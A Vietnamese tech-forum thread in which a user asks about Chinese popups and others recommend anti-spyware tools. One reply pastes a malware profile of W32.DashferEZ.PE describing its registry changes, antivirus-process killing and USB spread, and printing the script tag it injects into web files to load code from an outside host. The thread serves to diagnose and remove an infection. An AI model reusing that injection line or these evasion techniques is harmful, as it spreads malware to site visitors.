Máy bị như thế này có phải là virus không vậy?

[luongha83p2]

Mấy hôm nay máy mình đang sử dung cứ vào trang web nào đó thì ngay lập tức bên góc phải bên dưới của màn hình hiện lên một khung nhỏ có vài dòng chữ mà mình nghĩ là của Trung Quốc.

Nếu bấm vào dấu chéo trên góc để tắt nó đi thì nó sẽ hiện ra một trang web toàn tiếng Trung Quốc.

Bạn nào biết cách xử lý chỉ giúp mình. Cảm ơn

[bell.lina]

download phần mềm diệt spyware về diệt xem sao

Ad-Aware 2008

or

Spybot - Search & Destroy 1.5.2

[kenshin]

Ad-Aware 2007 hoặc Ad-Aware 2008

[hajdajgja]

1 là win trung quốc

2 là spyware--->cái này hơi khó mình mò được trong reg nhưng không nhớ lắm gần như 100%

bạn dùng spyware doctor xem

[tai line]

Bạn không nhớ đã có 1 thời loại Virus đến từ TQ này đã hoành hành trên khắp thế giới à?

Hãy Update 1 cái Antivirus mới nhất mà diệt nó bạn ạ.

[Lenguyen1508]

Mã:

	* Tên malware: W32.DashferEZ.PE

* Thuộc họ: W32.Dashfer.PE

* Loại: PE

* Xuất xứ: Trung Quốc

* Ngày phát hiện mẫu: 17/05/2008

* Kích thước: 156Kb

* Mức độ phá hoại: Cao



Nguy cơ:



* Làm giảm mức độ an ninh của hệ thống.



Hiện tượng:



* Sửa registry.

* Không vào được chế độ safe mode của Windows.

* Xuất hiện popup các trang web tiếng Trung Quốc.

* Mất checkbox để hiển thị các file hệ thống.



Cách thức lây nhiễm:



* Phát tán qua trang web.

* Tự động lây nhiễm qua USB.

* Lây qua các file thực thi.



Cách phòng tránh:



* Không nên vào các trang web cung cấp các phần mềm C.r.@.c.k, hack, các trang web đen, độc hại

* Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.



Mô tả kỹ thuật:



* Xóa các K.@.y :

HKLM\...\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\...\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

làm cho máy tính không khởi động được trong chế độ safemode.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

* Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup

để virus được thực thi khi khởi đông hệ thống.

* Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.

* Dump ra các file :

%SysDir%\Com\smss.exe

%SysDir%\Com
etcfg.dll

%SysDir%\Com
etcfg.000

%SysDir%\Drivers\Alg.exe

* Sửa K.@.y làm mất checkbox để hiển thị các file hệ thống.

* Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.

* Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard.

* Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :

<script src="http://js.k01[removed].com/01.asp"></script>

* Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống.

BKAV bạn à [IMG]http://www.*******************/dd/public/style_emoticons/<#EMO_DIR#>/smile.gif[/IMG]